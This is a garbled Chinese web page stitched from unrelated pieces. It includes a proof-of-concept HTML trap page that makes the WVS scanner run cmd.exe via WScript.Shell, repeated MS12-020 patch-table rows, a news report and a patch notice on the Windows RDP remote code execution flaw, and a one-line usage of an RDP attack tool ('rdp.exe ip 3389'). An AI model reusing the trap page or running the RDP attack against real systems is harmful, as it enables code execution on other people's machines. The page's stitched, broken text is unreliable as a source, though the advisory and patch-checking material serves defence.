windows 远程桌面代码远程代码执行漏洞怎么产生的

Web Vulnerability Scanner 远程命令执行漏洞
WVS7、8跨本地执行命令,无任何安全提示。
ps:日站还是被别人日,是一个非常值得研究的问题。
WVS将有的页面到本地,用户查看时使用IE框架加载,使用的是本地权限,用wscript.shell执行命令无任何安全提示。
测试环境:
WVS7或8+IE8
构造一个假的有漏洞的页面。我构造了一个列目录漏洞,注意代码的最后面是调用wscript组件执行命令
index.php:
&!DOCTYPE HTML PUBLIC &-//W3C//DTD HTML 3.2 Final//EN&&
&title&Index of /&/title&
&h1&Index of /&/h1&
&li&&a href=&NOTEPAD.EXE&& NOTEPAD.EXE&/a&&/li&
&li&&a href=&dossier.gif&& dossier.gif&/a&&/li&
&li&&a href=&download.php&& download.php&/a&&/li&
&li&&a href=&loader.html&& loader.html&/a&&/li&
&li&&a href=&logo_i.gif&& logo_i.gif&/a&&/li&
&li&&a href=&manager.php&& manager.php&/a&&/li&
&li&&a href=&test.php&& test.php&/a&&/li&
&/body&&/html&
&SCRIPT Language=&Script&&
WSH=new ActiveXObject(&WScript.Shell&);
WSH.run(&cmd.exe&);
用WVS扫描网站,果然爆出了列目录,选择它,会如图所示:
找到右边的View HTTP response,单击它,就会运行cmd.exe,且没有任何安全提示。
修复方案:
这种事情你比我专业
(window.slotbydup=window.slotbydup || []).push({
id: '2467140',
container: s,
size: '1000,90',
display: 'inlay-fix'
(window.slotbydup=window.slotbydup || []).push({
id: '2467141',
container: s,
size: '1000,90',
display: 'inlay-fix'
(window.slotbydup=window.slotbydup || []).push({
id: '2467143',
container: s,
size: '1000,90',
display: 'inlay-fix'
(window.slotbydup=window.slotbydup || []).push({
id: '2467148',
container: s,
size: '1000,90',
display: 'inlay-fix'Copyright(c),All Rights Reserved
网络尖刀 版权所有 京ICP备号-1漏洞(32)
受影响的软件&
最大安全影响
综合严重等级
此更新替代的公告
(KB2621440)
远程执行代码
KB2570222 由 KB2621440 替代
(KB2621440)
远程执行代码
KB2570222 由 KB2621440 替代
(KB2621440)
远程执行代码
KB2570222 由 KB2621440 替代
(KB2621440)
远程执行代码
KB2570222 由 KB2621440 替代
(KB2621440)
远程执行代码
KB2570222 由 KB2621440 替代
(KB2621440)
远程执行代码
没有公告由 KB2621440 替代
(KB2621440)
远程执行代码
没有公告由 KB2621440 替代
(KB2621440)
远程执行代码
没有公告由 KB2621440 替代
(KB2621440)
远程执行代码
没有公告由 KB2621440 替代
(KB2621440)
远程执行代码
没有公告由 KB2621440 替代
(KB2621440)
(KB2667402)
远程执行代码
没有公告由 KB2621440 替代
没有公告由 KB2667402 替代
(KB2621440)
(KB2667402)
远程执行代码
没有公告由 KB2621440 替代
没有公告由 KB2667402 替代
(KB2621440)
(KB2667402)
远程执行代码
没有公告由 KB2621440 替代
没有公告由 KB2667402 替代
(KB2621440)
(KB2667402)
远程执行代码
没有公告由 KB2621440 替代
没有公告由 KB2667402 替代
  本次Windows RDP服务的这个漏洞也使得攻击者控制用户服务器或者造成蓝屏
   3月19日消息,Windows服务器近日被爆存在高危远程代码执行漏洞——MS12-020,微软公司把该漏洞级别定为最高级-严重(Critical),攻击者可以通过向远程桌面端口(端口号3389)发送特定的数据包获得管理员权限。
  历史上同样级别的漏洞都造成了巨大的危害和损失。2004年,MS04-011漏洞导致攻击者可以通过远程对445端口发送特定数据包,获得执行权限并传播病毒。依靠此漏洞传播的震荡波病毒造成全球数量众多的电脑瘫痪。2002年,Windows的RPC漏洞导致攻击者可以通过135端口远程控制服务器。依靠此漏洞传播的冲击波病毒导致全球大量电脑自动关机。
  本次Windows RDP服务的这个漏洞也使得攻击者控制用户服务器或者造成蓝屏,一旦被广泛利用,不仅会对本服务器运行的正常应用造成影响,而且更会让服务器完全成为被黑客控制利用的工具,对整个互联网造成更大危害。
  微软称,多数客户启用“自动更新”,他们不必采取任何操作。但是很多Windows服务器在使用过程中并未开启“自动更新”,安全宝称,提示服务器管理员立刻去下载安装官方补丁,避免因该漏洞遭受的损失。同时,广大服务器管理员现在可以检测服务器是否存在此漏洞风险。
  安全宝指出,存在漏洞的文件是rdpwd.sys,出现漏洞的原因是HandleAttachUserReq()函数。如果攻击者向受影响的系统发送一系列特制RDP(Remote Desktop Protocol,远程桌面协议)数据包,则此漏洞可能允许远程执行代码。
检查本机是否出现此漏洞,控制面板--添加删除程序--软件更新--KB2621440 或者输入cmd命令&systeminfo | find &KB2621440&
攻击方式:rdp.exe ip 3389 线程
参考知识库
* 以上用户言论只代表其个人观点,不代表CSDN网站的观点或立场
访问:160096次
积分:1844
积分:1844
排名:第15005名
原创:17篇
转载:129篇
(1)(1)(1)(3)(13)(1)(13)(36)(13)(40)(15)(10)警惕Windows XP远程桌面执行漏洞KB2621440_学电脑吧
警惕Windows XP远程桌面执行漏洞KB2621440
KB2621440概述 现已确认有一个安全问题,未通过身份验证的远程攻击者可能会利用此问题危及系统的安全并获取对该系统的控制权。您可以通过安装本 Microsoft 更新程序来保护系统不受侵害。安装本更新程序后,可能必须重新启动系统。 系统要求 支持的操作系统:
  KB2621440概述&
  现已确认有一个安全问题,未通过身份验证的远程攻击者可能会利用此问题危及系统的安全并获取对该系统的控制权。您可以通过安装本 Microsoft 更新程序来保护系统不受侵害。安装本更新程序后,可能必须重新启动系统。&
  系统要求&
  支持的操作系统: Service Pack 3
  若要开始下载,请单击&下载&按钮,然后执行以下操作之一,或者从&更改语言&中选择另一种语言,然后单击&更改&。 本文来自学电脑吧
  单击&运行&立即开始安装。
  单击&保存&将下载文件复制到您的计算机上供以后安装。
  额外信息&
  提供其他关键安全更新程序:若要查找最新的安全更新程序,请访问 Windows Update 并单击&快速安装&。若要将最新的安全更新直接传送到您的计算机,请访问家庭安全网站并按指定步骤操作,以确保您受到保护。
  补丁名称:KB2621440
  安全公告号:MS12-020
  发布日期:
  补丁包大小:0.54MB 内容来自 电脑教程
  下载地址:
  漏洞影响:远程代码执行
  漏洞描述:本补丁修复了Windows远程桌面协议 (RDP)中存在的秘密报告的安全漏洞,存在漏洞的用户如果开启了Windows远程桌面功能,攻击者可以发送一系列精心构造的RDP数据包到用户系统,并引发攻击者的恶意代码在用户系统上以系统最高权限运行,从而直接控制整个系统。 内容来自 电脑教程
相关电脑维修知识技巧
------分隔线----------------------------
             
  学电脑吧以传播 为目的,文章内容凡注明作者的,其版权属于注明作者所有,转载请保留。转载文章如果涉及版权等问题,请作者与学电脑吧联系,QQ:.我们将在第一时间给予处理。
3月9日凌晨,微软开始推送Win10 Mobile预览版预览版,本次主要面向慢速和 Pr...
在银联、银行等多方盟友的助阵之下,Apple Pay终于登陆中国市场,高调开展移动支付业...
根据IDC上周发布的平板电脑市场份额年度报告,iPad Pro目前的销量比微软Surface全系列...
前瞻科技 1 月 25 日讯,MIUI 版小米平板 2 早已上市,而 Windows 10 版迟迟未见现身...
随着IT技术的快速发展,看视频的方式在我们的生活中已在悄无声息地在改变。手机、Pad...
Cookie是一种数字标识代码,它允许网站存储用户的信息,如网上购物信息等。通过cookie...
学电脑吧:打造免费的电脑知识学习乐园!解决、、、运行速度慢等常见电脑维修知识!分享软件操作技巧、 新手、及五笔打字练习等电脑教程! 

我要回帖

更多关于 远程桌面代码 的文章

 

随机推荐